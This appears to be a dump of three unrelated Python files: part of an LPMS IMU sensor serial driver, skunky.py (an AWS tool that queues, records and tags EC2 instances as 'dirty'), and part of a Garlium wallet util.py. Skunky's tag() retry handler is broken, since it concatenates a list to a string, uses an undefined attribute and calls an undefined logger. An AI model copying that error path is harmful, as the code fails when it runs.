self.altitude = converter(o, self.rx_buffer)
o += increment
# 10 Fixed point
if data_mode == 16:
self.altitude *= 100
if self.sensor_configuration.temperature_enable:
self.temperature = converter(o, self.rx_buffer)
o += increment
# 100 Fixed point
if data_mode == 16:
self.temperature *= 10
def __parse_sensor_data_16bit(self):
o = 0
r2d = 57.2958
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
o += 4
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
self.gyr_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
self.gyr_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
if self.sensor_configuration.accelerometer_enable:
self.acc_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.acc_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.acc_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
if self.sensor_configuration.magnetometer_enable:
self.mag_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
self.mag_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
self.mag_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
if self.sensor_configuration.quaternion_enable:
self.quat_w = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
if self.sensor_configuration.euler_enable:
self.euler_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
self.euler_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
self.euler_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.linacc_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.linacc_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
if self.sensor_configuration.pressure_enable:
self.pressure = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
# communication
def __get_config_register(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
if self.verbose: logd(self.TAG, "Get config register")
time.sleep(.1)
self.__lpbus_set_none(LPMS_GET_CONFIG)
self.wait_for_data = True
self.__wait_for_response()
def __send_data(self, function, length):
txlrc_check = 0
txBuffer = chr(0x3a)
txBuffer += self.__convert_int16_to_txbytes(self.imu_id)
txBuffer += self.__convert_int16_to_txbytes(function)
txBuffer += self.__convert_int16_to_txbytes(length)
if length > 0:
txBuffer += self.raw_tx_data
txlrc_check = self.imu_id + function + length
if length > 0:
txlrc_check += sum([ord(c) for c in self.raw_tx_data])
txBuffer += self.__convert_int16_to_txbytes(txlrc_check)
txBuffer += chr(0x0d)
txBuffer += chr(0x0a)
self.__print_str_to_hex(txBuffer)
bytesSent = self.serial_port.write(txBuffer)
def __lpbus_set_none(self, command):
self.__send_data(command, 0)
def __lpbus_set_int32(self, command, v):
self.raw_tx_data = self.__convert_int_to_txbytes(v)
self.__send_data(command, 4)
def __lpbus_set_data(self, command, length, dataBuffer):
self.raw_tx_data = dataBuffer
self.__send_data(command, length)
def __wait_for_response(self):
while self.wait_for_ack or self.wait_for_data:
time.sleep(.1)
def __parse_configuration_register(self, cr):
self.sensor_configuration.parse(cr)
# User command
def connect(self):
if self.__thread_is_alive():
loge(self.TAG, "Another connection established")
return False
try:
self.__clear_params()
self.thread = threading.Thread(target=self.__run, args=())
self.serial_port = serial.Serial(self.port, self.baudrate , timeout=None,xonxoff=False, rtscts=False, dsrdtr=False)
self.quit = False
logd(self.TAG , "Sensor connected")
#thread.daemon = True # Daemonize thread
self.thread.start() # Start the execution
time.sleep(1)
self.set_command_mode() # Start the execution
time.sleep(.2)
self.__get_config_register() # Start the execution
time.sleep(.2)
self.set_streaming_mode()
return True
except serial.SerialException:
loge(self.TAG, "Could not open port " + self.port)
loge(self.TAG, "Please try again")
return False
def disconnect(self):
self.quit = True
if self.__thread_is_alive():
self.thread.join()
logd(self.TAG , "sensor disconnected")
return True
def is_connected(self):
return self.is_sensor_connected
# Configuration and Status
def get_config_register(self):
"""
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(LPMS_GET_CONFIG)
self.wait_for_data = True
self.__wait_for_response()
"""
return self.sensor_configuration
def get_status_register(self):
pass
# Mode switching
def set_command_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
if self.verbose: logd(self.TAG, "Set command mode")
self.__lpbus_set_none(LPMS_GOTO_COMMAND_MODE)
self.wait_for_ack = True
self.__wait_for_response()
self.is_command_mode = True
def set_streaming_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set streaming mode")
self.__lpbus_set_none(LPMS_GOTO_STREAM_MODE)
self.wait_for_ack = True
self.__wait_for_response()
self.is_command_mode = False
# Data transmision
def get_sensor_data(self):
"""
get sensor data during command Mode
"""
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
if self.verbose: logd(self.TAG, "Get sensor data")
self.__lpbus_set_none(LPMS_GET_SENSOR_DATA)
self.wait_for_data = True
self.__wait_for_response()
return self.get_stream_data()
def get_stream_data(self):
"""
get sensor data during stream Mode
"""
data = []
data.append(self.imu_id)
data.append(self.timestamp)
data.append(self.frame_counter)
data.append(self.battery_level)
data.append(self.battery_voltage)
data.append(self.temperature)
data.append([self.acc_x, self.acc_y, self.acc_z])
data.append([self.gyr_x, self.gyr_y, self.gyr_z])
data.append([self.mag_x, self.mag_y, self.mag_z])
data.append([self.quat_w, self.quat_x, self.quat_y, self.quat_z])
data.append([self.euler_x, self.euler_y, self.euler_z])
data.append([self.linacc_x, self.linacc_y, self.linacc_z])
return data
def set_transmit_data(self):
pass
def set_baudrate(self, baud):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set baudrate: "+str(baud)+"bps")
self.__lpbus_set_int32(LPMS_SET_UART_BAUDRATE ,baud)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_stream_frequency(self, freq):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set stream freq: "+str(freq)+"Hz")
self.__lpbus_set_int32(LPMS_SET_STREAM_FREQ , freq)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_stream_frequency_5Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_5HZ)
def set_stream_frequency_10Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_10HZ)
def set_stream_frequency_25Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_25HZ)
def set_stream_frequency_50Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_50HZ)
def set_stream_frequency_100Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_100HZ)
def set_stream_frequency_200Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_200HZ)
def set_stream_frequency_400Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_400HZ)
def set_16bit_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set 16 bit data")
self.__lpbus_set_int32(LPMS_SET_LPBUS_DATA_MODE, LPMS_LPBUS_DATA_MODE_16)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_32bit_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set 32 bit data")
self.__lpbus_set_int32(LPMS_SET_LPBUS_DATA_MODE, LPMS_LPBUS_DATA_MODE_32)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
# Register value save and reset
def save_parameters(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Save parameters to sensor")
self.__lpbus_set_none(LPMS_WRITE_REGISTERS)
self.wait_for_ack = True
self.__wait_for_response()
self.set_streaming_mode()
def reset_factory(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Reset factory settings")
self.__lpbus_set_none(LPMS_RESET_FACTORY_VALUE)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
# Reference setting and offset reset
def reset_reference(self):
pass
def start_mag_calibration(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
self.set_command_mode()
if self.verbose: logd(self.TAG, "Start mag calibration")
self.__lpbus_set_none(LPMS_START_MAG_CALIBRATION)
self.wait_for_ack = True
self.__wait_for_response()
self.set_streaming_mode()
# Debug Log
def start_debug_logging(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(START_DEBUG_LOGGING)
self.wait_for_ack = True
self.__wait_for_response()
def stop_debug_logging(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(STOP_DEBUG_LOGGING)
self.wait_for_ack = True
self.__wait_for_response()
def clear_debug_log(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(CLEAR_DEBUG_LOG)
self.wait_for_ack = True
self.__wait_for_response()
def full_flash_erase(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(FULL_FLASH_ERASE)
self.wait_for_ack = True
self.__wait_for_response()
def get_debug_log_status(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(GET_DEBUG_LOGGING_STATUS)
self.wait_for_data = True
self.__wait_for_response()
return self.debugLoggingStatus
def get_debug_log_size(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(GET_DEBUG_LOG_SIZE)
self.wait_for_data = True
self.__wait_for_response()
return self.debug_log_size
def get_debug_log(self, indexStart, indexStop):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
if indexStop < 0:
loge(self.TAG, "Error index")
return
self.debug_log_size = indexStop - indexStart + 1
self.debug_log_size_index = 0
data = ""
data += self.__convert_int_to_txbytes(indexStart)
data += self.__convert_int_to_txbytes(indexStop)
self.__lpbus_set_data(GET_DEBUG_LOG, 8, data)
|
skunky.py
|
#!/usr/bin/env python
import hashlib
import json
import logging
import logging.config
import os
import sys
import time
from multiprocessing import Process
import boto3
from botocore.exceptions import ClientError
from decimal import Decimal
import import_string
from skunky.aws.lambdakickass import LambdaKickass
__version__ = '0.1.0'
LOGGER = None
logging.getLogger('boto3').setLevel(logging.CRITICAL)
logging.getLogger('botocore').setLevel(logging.CRITICAL)
Session = boto3.Session()
class Filter(object):
def __init__(self, config=None):
self.config = config
def apply(self, input_list):
raise NotImplementedError
class Auditor(object):
def __init__(self, config=None):
self.config = config
def audit(self, input_list):
raise NotImplementedError
class Skunky(object):
def __init__(self, session, config='config.json', ttl_time=2592000, time_run=285):
self.config = self._init_config(config)
self._init_logging()
self.session = session
self.region = self.config.get('region', 'us-west-2')
self.ttl_time = self.config.get('ttl_time', 2592000)
self.time_run = self.config.get('time_run', 285)
self.lk = LambdaKickass(session=self.session)
self.sqs_client = self.session.client('sqs', region_name=self.region)
self.dynamodb_resource = self.session.resource('dynamodb', region_name=self.region)
self.dynamodb_table_name = 'Skunky'
self.dynamodb_table = self.dynamodb_resource.Table(self.dynamodb_table_name)
self.queue_name = 'skunky'
self.queue_url = self.get_queue_url()
self.to_be_skunked = {}
self.time_start = Decimal(time.time())
self.expire = None
self.active_filters = self.config.get('ACTIVE_FILTERS', [])
self.active_auditors = self.config.get('ACTIVE_AUDITORS', [])
self.filter_plugins = []
self.auditor_plugins = []
def _init_logging(self):
global LOGGER
logging.config.dictConfig(self.config['logging'])
LOGGER = logging.getLogger(__name__)
def _init_config(self, config_file):
try:
with open(os.path.join(os.getcwd(), config_file), 'r') as f:
config = json.load(f)
return config
except IOError:
LOGGER.fatal("Unable to load config from {}!".format(config_file))
def _load_filters(self):
for filter_plugin in self.active_filters:
cls = None
try:
cls = import_string(filter_plugin)
except ImportError as e:
LOGGER.warn("Unable to find plugin {}, exception: {}".format(filter_plugin, e))
else:
plugin = None
try:
plugin = cls(config=self.config['filter_config'].get(cls.__name__))
except KeyError:
plugin = cls()
LOGGER.info('Loaded plugin {}'.format(filter_plugin))
self.filter_plugins.append(plugin)
def _load_auditors(self):
for auditor_plugin in self.active_auditors:
cls = None
try:
cls = import_string(auditor_plugin)
except ImportError as e:
LOGGER.warn("Unable to find plugin {}, exception: {}".format(auditor_plugin, e))
else:
plugin = None
try:
plugin = cls(config=self.config['auditor_config'].get(cls.__name__))
except KeyError:
plugin = cls()
LOGGER.info('Loaded plugin {}'.format(auditor_plugin))
self.auditor_plugins.append(plugin)
def run(self):
LOGGER.info("Skunky starting...")
self.expire = self.time_start + self.time_run
self._load_filters()
self._load_auditors()
self._start()
def _start(self, silent=False):
while True:
if self.expire and time.time() > self.expire:
LOGGER.warn("Skunky running out of time, starting fresh...")
return
self.receive_identities_from_queue()
self.skunk_instances()
time.sleep(1)
def get_queue_url(self):
response = self.sqs_client.get_queue_url(QueueName=self.queue_name)
return response['QueueUrl']
def receive_identities_from_queue(self):
response = self.sqs_client.receive_message(QueueUrl=self.queue_url, AttributeNames=[
'All'], WaitTimeSeconds=5, MaxNumberOfMessages=10)
for message in response.get('Messages', []):
identity = json.loads(message['Body'])
skunk = {
"identity": dict(identity),
"dirty_timestamp": message['Attributes']['SentTimestamp'],
"receipt_handle": message['ReceiptHandle']
}
self.add_to_skunk(skunk)
def add_to_skunk(self, skunk):
account_id = skunk['identity']['instance_account_id']
instance_region = skunk['identity']['instance_region']
for filter in self.filter_plugins:
try:
if filter.apply(skunk['identity']):
# If a filter say don't skunk then we return and don't add to list
return
except Exception as e:
LOGGER.error('Exception Caught in Filter Plugin - {}: {}'.format(filter, e))
if self.to_be_skunked.get(account_id, '') == '':
self.to_be_skunked[account_id] = {}
self.to_be_skunked[account_id][instance_region] = []
self.to_be_skunked[account_id][instance_region].append(skunk)
elif self.to_be_skunked[account_id].get(instance_region, '') == '':
self.to_be_skunked[account_id][instance_region] = []
self.to_be_skunked[account_id][instance_region].append(skunk)
else:
self.to_be_skunked[account_id][instance_region].append(skunk)
def delete_identity_from_queue(self, receipt_handle_list):
delete_response = self.sqs_client.delete_message_batch(
QueueUrl=self.queue_url, Entries=receipt_handle_list)
def skunk_instances(self):
for account, regions in self.to_be_skunked.items():
for region, identities in self.to_be_skunked[account].items():
instance_resources = []
receipt_handles = []
count = 0
for skunk in self.to_be_skunked[account][region]:
# Add instance to DynamoDB table
if self.put(skunk):
count = count + 1
instance_resources.append(skunk['identity']['instance_id'])
receipt_handles.append({'Id': str(count), 'ReceiptHandle': skunk['receipt_handle']})
try:
for auditor in self.auditor_plugins:
proc = Process(target=auditor.audit, args=(skunk['identity'],))
proc.start()
except Exception as e:
LOGGER.error('Exception Caught in Auditor Plugin - {}: {}'.format(auditor, e))
if len(self.to_be_skunked[account][region]) > 0:
if self.config.get('tag', True):
self.tag(account, region, instance_resources)
if count > 0:
self.delete_identity_from_queue(receipt_handles)
self.to_be_skunked[account][region] = []
def tag(self, account, region, instances):
ec2_client = self.lk.connect_to_region(technology='ec2', account=account,
region=region, profile="Skunky", session_id="skunkystinks")
retry = [5, 5, 3, 3, 1, 1]
added = False
while len(retry) > 0 and not added:
try:
ec2_client.create_tags(
Resources=instances,
Tags=[
{
'Key': 'dirty',
'Value': 'skunked'
},
]
)
added = True
except ClientError:
instance_string = ''
for instance in instances:
instance_string = instance_string + instances + ","
LOGGER.error("Failed to mark dirty the following instances in {}:{} - {}".format(account, region, region.instance_string))
if len(retry) > 0:
retry_time = retry.pop()
logger.debug("Sleeping {} and retrying".format(retry_time))
time.sleep(retry_time)
def put(self, skunk):
""" Will create a new entry only if one doesn't already exist """
item = {}
item['hash'] = self.hash(skunk)
item['instance_id'] = skunk['identity']['instance_id']
item['skunk_level'] = skunk['identity'].get('skunk_level', 'unknown')
item['account_id'] = skunk['identity']['instance_account_id']
item['region'] = skunk['identity']['instance_region']
item['marked_dirty'] = skunk['dirty_timestamp']
item['identity'] = json.dumps(skunk['identity'])
item['ttl'] = self.ttl()
retry = [5, 5, 3, 3, 1, 1]
added = False
while len(retry) > 0 and not added:
try:
self.dynamodb_table.put_item(Item=item, ExpressionAttributeNames={"#h": "hash"},
ConditionExpression="attribute_not_exists(#h)")
added = True
except ClientError as e:
if "ConditionalCheckFailedException" == e.response['Error']['Code']:
return False
if len(retry) > 0:
retry_time = retry.pop()
LOGGER.debug("Sleeping {} and retrying".format(retry_time))
time.sleep(retry_time)
except Exception:
raise
return True
def hash(self, skunk):
return '{}::{}::{}::{}'.format(skunk['identity']['instance_account_id'], skunk['identity']['instance_region'],
skunk['identity']['instance_id'], skunk['dirty_timestamp'])
def ttl(self):
return int(time.time() + self.ttl_time)
def main():
try:
skunky = Skunky(session=Session, config='config.json')
skunky.run()
except KeyboardInterrupt:
logging.debug("Skunky exiting due to KeyboardInterrupt...")
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'GRLC':8, 'mGRLC':5, 'uGRLC':2, 'clove':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['GRLC', 'mGRLC', 'uGRLC', 'clove'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " LTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
#is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.garlium_ltc.garlium_ltc'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/garlium'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".garlium")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Garlium")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Garlium")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
